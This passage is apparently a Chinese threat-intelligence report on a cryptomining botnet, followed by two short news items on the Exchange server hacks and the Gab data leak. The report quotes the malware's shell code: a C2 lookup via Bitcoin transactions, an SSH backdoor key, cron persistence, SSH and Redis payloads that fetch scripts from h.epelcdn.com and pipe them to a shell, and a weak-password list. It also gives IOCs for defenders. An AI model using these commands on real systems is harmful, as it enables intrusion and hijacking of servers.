aa="1Hf2CKoVDyPj7dNn3vgTeFMgDqVvbVNZQq" bb="https://api.blockcypher.com/v1/btc/main/addrs/$aa?limit=2" cc=`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==2'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,3,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'`"."`curl -v --stderr - $bb |grep value|awk '{print $2}' |sed 's/[[:punct:]]//g; s/[[:space:]]/\n/g'|awk '{printf("%x\n",$0)}'|awk '{print substr($0,1,2)}'|awk '{print strtonum("0x"$0)}'|awk 'NR==1'` fi 挖矿 1. init.sh首先通过端口、进程名、文件名、钱包、矿池匹配，清除竞品挖矿木马 2. 然后杀死tmp目录下的或者CPU占用超过40%的可疑程序。 3. 清理被用来挖矿的docker容器 docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % 4. 最后使用内置的URL依次下载攻击者控制的挖矿程序phpupdate、守护程序phpguard、攻击程序networkmanager并启动。 phpupdate采用开源挖矿程序XMRig编译： 持久化 1. init.sh通过安装crontab任务持久化。 if [ ! -f "/usr/bin/crontab" ] then   unlock_cron   echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1" >> ${crondir}   lock_cron else   unlock_cron   [[ $cont =~ "newdat.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1") | crontab -   lock_cron fi 2. 通过写入SSH authorized_keys公钥（留置后门）持久化。 chmod 700 /root/.ssh/       echo >> /root/.ssh/authorized_keys       chmod 600 root/.ssh/authorized_keys       echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys 3. 通过守护程序phpguard持久化 phpguard主要完成以下功能： 1） 将挖矿程序添加到Linux crontab定时任务（Windows sctasks计划任务）中并启动； 2） 通过枚举进程检查挖矿程序是否处于运行状态，如果没有则启动程序，如果挖矿程序文件不存在则重新下载和运行。 横向移动 1.init.sh通过查询本机/root/.ssh/known_hosts中的SSH登陆记录，进行免密登陆连接，然后执行远程脚本spre.sh： if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- hxxp://h.epelcdn.com/dd210131/spre.sh | bash >/dev/null 2>&1 &' & done fi 2. 直接通过执行攻击脚本spre.sh: $bbdir -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash $bbdira -fsSL hxxp://h.epelcdn.com/dd210131/spre.sh | bash 3. 通过Redis空口令和弱口令入侵 1）首先利用Pnscan、masscan批量扫描6379端口扫描发现Redis服务器，然后尝试进行无密码登陆，或者利用以下弱口令进行爆破登陆： redis root oracle password p@aaw0rd abc123 abc123! 123456 admin 2）Redis入侵登陆成功后，利用Redis未授权访问漏洞，在系统中写入恶意crontab任务，在任务中下载和执行恶意脚本pm.sh进行感染。 echo 'config set dbfilename "backup.db"' > .dat echo 'save' >> .dat echo 'flushall' >> .dat echo 'set backup1 "\n\n\n*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/4 * * * * cdt -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/5 * * * * wdt -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup1 "\n\n\n*/6 * * * * cd1 -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup2 "\n\n\n*/7 * * * * wd1 -q -O- hxxp://h.epelcdn.com/dd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup3 "\n\n\n*/8 * * * * cd1 -fsSL hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'set backup4 "\n\n\n*/9 * * * * wd1 -q -O- hxxp://localhost/bd210131/pm.sh | sh\n\n"' >> .dat echo 'config set dir "var/spool/cron/"' >> .dat echo 'config set dbfilename "root"' >> .dat echo 'save' >> .dat echo 'config set dir "var/spool/cron/crontabs"' >> .dat echo 'save' >> .dat 4. 通过下载的攻击程序networkmanager进行横向移动，利用9种服务器应用的漏洞进行远程攻击，将go语言编写的木马程序networkmanager还原函数名的到如下内容： 1) Redis未授权访问漏洞； __tmp_0324_scan_exp_Redis_exploit __tmp_0324_scan_exp_re_exploit_connect_redis __tmp_0324_scan_exp_re_exploit_rce __tmp_0324_scan_exp_re_exploit_redis_brute __tmp_0324_scan_exp_re_exploit_unaurority_rce 2) Drupal RCE漏洞CVE-2018-7600； __tmp_0324_scan_exp_Drupal_exploit __tmp_0324_scan_exp_dp_7600_rce __tmp_0324_scan_exp_dp_7600_ver8_rce __tmp_0324_scan_exp_dp_7600_ver8_rce_func1 __tmp_0324_scan_exp_dp_check_payload __tmp_0324_scan_exp_dp_check_payload_func1 __tmp_0324_scan_exp_dp_isdrupal __tmp_0324_scan_exp_dp_isdrupal_func1 3) Hadoop未授权访问漏洞； __tmp_0324_scan_exp_Hadoop_exploit __tmp_0324_scan_exp_hd_exploit_unaurority_rce __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func1 __tmp_0324_scan_exp_hd_exploit_unaurority_rce_func2 4) Spring RCE漏洞CVE-2018-1273； __tmp_0324_scan_exp_Spring_exploit __tmp_0324_scan_exp_sp_cve20181273_exists __tmp_0324_scan_exp_sp_cve20181273_exists_func1 __tmp_0324_scan_exp_sp_cve20181273_exploit __tmp_0324_scan_exp_sp_cve20181273_exploit_func1 5) Thinkphp V5高危漏洞； __tmp_0324_scan_exp_Thinkphp_exploit __tmp_0324_scan_exp_tp5_23_rce_Exists __tmp_0324_scan_exp_tp5_23_rce_Exists_func1 __tmp_0324_scan_exp_tp5_rce_Exists __tmp_0324_scan_exp_tp5_rce_Exists_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp __tmp_0324_scan_exp_tp_exploit_tp5_23_rce_exp_func1 __tmp_0324_scan_exp_tp_exploit_tp5_23rce __tmp_0324_scan_exp_tp_exploit_tp5rce __tmp_0324_scan_exp_tp_exploit_tp5rce_exp __tmp_0324_scan_exp_tp_exploit_tp5rce_exp_func1 __tmp_0324_scan_exp_tp_isThinkphp __tmp_0324_scan_exp_tp_isThinkphp_func1 6) WebLogic RCE漏洞CVE-2017-10271； __tmp_0324_scan_exp_Weblogic_exploit __tmp_0324_scan_exp_wl_cve201710271_rce __tmp_0324_scan_exp_wl_cve201710271_rce_func1 __tmp_0324_scan_exp_wl_cve201710271_t_rce __tmp_0324_scan_exp_wl_wls_urlistrue __tmp_0324_scan_exp_wl_wls_urlistrue_func1 7) SQLServer爆破登陆后利用xp_cmdshell、SP_OACreate执行Payload； __tmp_0324_scan_exp_Sqlserver_exploit __tmp_0324_scan_exp_ss_crack_login __tmp_0324_scan_exp_ss_execute_payload __tmp_0324_scan_exp_ss_execute_sql __tmp_0324_scan_exp_ss_exploit __tmp_0324_scan_exp_ss_exploit_sp_oacreate __tmp_0324_scan_exp_ss_exploit_xcmdshell 8) Elasticsearch远程代码执行漏洞 CVE-2015-1427、CVE-2014-3120； __tmp_0324_scan_exp_es_exploit_cve20143120_rce __tmp_0324_scan_exp_es_exploit_cve20143120_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20143120_t_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce __tmp_0324_scan_exp_es_exploit_cve20151427_rce_func1 __tmp_0324_scan_exp_es_exploit_cve20151427_t_rce 9) CCTV设备RCE漏洞。 __tmp_0324_scan_exp_Cctv_exploit __tmp_0324_scan_exp_cc_is_shell_rce __tmp_0324_scan_exp_cc_is_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_rce __tmp_0324_scan_exp_cc_shell_rce_func1 __tmp_0324_scan_exp_cc_shell_t_rce 三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：WebLogic, Elasticsearch等。 资源开发 注册C2服务器，利用比特币交易记录更新C2地址 初始访问 利用对外开放的WebLogic, Elasticsearch服务，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿、持久化和攻击模块 持久化 创建Crontab任务、写入SSH后门公钥，启动守护进程phpguard 横向移动 利用Redis未授权访问漏洞、SSH免密登陆、Wed应用漏洞等方法横向移动 防御规避 木马文件加壳保护，将文件命名为系统文件名并设置为系统属性 发现 通过~/.ssh/known_hosts和~/.ssh/id_rsa.pub发现入侵主机历史登录凭据，用于进一步横向移动 命令与控制 守护模块phpguard，存在动态更新C2地址，根据不同的系统下发不同的Payload、执行任意命令的功能 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 该团伙相关的威胁数据已加入腾讯安全威胁情报，已赋能给腾讯全系列安全产品，用户可以通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙已支持拦截利用Elasticsearch漏洞发起的恶意攻击行为。 腾讯主机安全（云镜）可对病毒攻击过程中产生得木马落地文件进行自动检测，用户可后台一键隔离，删除。 私有云用户可通过腾讯高级威胁检测系统（御界）进行流量检测分析，及时发现黑客团伙的攻击活动。 腾讯高级威胁检测系统（御界）可检测到利用Elasticsearch远程代码执行漏洞CVE-2015-1427发起的恶意攻击行为。   IOCs MD5: Networkmanager 9960bac4ddc3e864a167e03037b9e65a Phpguard 35269826d788370c3be184261adde884 Phpupdate 149c79bf71a54ec41f6793819682f790 spre.sh 4da10654aeecef6c766c3352a07955de scan.sh 1b849002406d6370754c45c6b3a41e9a pm.sh 37298c13dba7a26ae068dd02225fb5b5 Domain h.epelcdn.com sh.epelcdn.com URL hxxp://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh hxxp://h.epelcdn.com/dd210131/spre.sh hxxp://h.epelcdn.com/dd210131/scan.sh hxxp://sh.epelcdn.com/dd09162/pm.sh hxxp://h.epelcdn.com/dd210131/pm.sh hxxp://176.123.7.127/id210131/phpupdate hxxp://h.epelcdn.com/dd210131/phpupdate hxxp://176.123.7.127/id210131/newdat.sh hxxp://h.epelcdn.com/dd210131/newdat.sh hxxp://176.123.7.127/id210131/config.json hxxp://h.epelcdn.com/dd210131/config.json hxxp://176.123.7.127/id210131/networkmanager hxxp://h.epelcdn.com/dd210131/networkmanager hxxp://176.123.7.127/id210131/phpguard hxxp://h.epelcdn.com/dd210131/phpguard   参考链接： https://www.freebuf.com/column/205114.html https://blogs.akamai.com/sitr/2021/02/bitcoins-blockchains-and-botnets.html https://unit42.paloaltonetworks.com/watchdog-cryptojacking/ https://s.tencent.com/research/report/1012.html    

本周五，一位知情人士表示，微软（Microsoft Corp.）电子邮件软件中的一个漏洞遭黑客攻击，超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司（SolarWinds Corp）下载的所有受污染代码，该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示，最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示，来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁，但黑客攻击仍在继续。 微软最初曾表示，此次黑客攻击是“有限的、有针对性的攻击”，周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作，为客户提供帮助。 此外，微软公司补充说，“受到影响的客户应联系我们的支持团队，以获得额外的帮助和资源。” 对连接设备的一次扫描显示，截至本周五，只有10%的易受攻击的设备安装了补丁，不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞，美国官员正在努力研究如何通知所有受害者，并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本，而不是依赖云提供商。记录显示，后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局（Federal Cybersecurity and Infrastructure Security Agency）没有回应置评请求。 本周五早些时候，白宫新闻秘书Jen Psaki对记者表示，目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”，且“可能产生深远的影响”。 Psaki表示：“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示，中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击，已经在上个月发展成为了一场广泛的战役。安全官员表示，这意味着除非中国改变了策略，否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播，预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示，目前黑客们只是利用漏洞重新进入并在受感染的网络中移动，这只占很小比例，可能不到十分之一。 他说：“目前有几百人正在以最快的速度利用它们，窃取数据，并安装其他方法，以便稍后返回。” 最初的攻击途径是由中国台湾知名网络研究员Cheng-Da Tsai发现的。蔡表示，他在今年1月向微软报告了这一漏洞。他在一篇博客文章中说，他正在调查信息是否泄露。 他没有回应进一步置评的请求。           （消息来源：cnBeta；封面源自网络）

在 Palar 被关闭之后，大量用户涌向了一个类似的平台–Gab，不过该平台近日遭到了黑客攻击。超过 1.5 万名 Gab 用户的公共和个人信息被窃取。援引 Wired 报道，该黑客利用 SQL 注入漏洞从后台数据库中窃取了大约 70GB 的平台用户数据，包含该网站的 4000 多万条帖子。 这些数据包括 1.5 万名 Gab 用户的公共、私人互动，并详细说明了用户的个人资料、哈希密码和组别的纯文本密码。而在泄漏的用户中，包括前美国总统特朗普、MyPillow 首席执行官迈克-林德尔，国会女议员马乔里-泰勒-格林和 Infowars 主持人亚历克斯-琼斯等知名人士的账户。不过，该公司否认自己遭遇了数据泄露，并向 Gab 用户保证，他们的密码没有被泄露。 反保密活动组织 DDoSecrets 已经将这些数据汇编成了一个名为 GabLeaks 的东西，打算将其提供给选定的记者、社会科学家和研究人员进行进一步分析。这引起了 Gab 首席执行官安德鲁-托巴的回应，他将这些黑客活动家描述为 “精神病 “恶魔。       （消息及封面来源：cnBeta）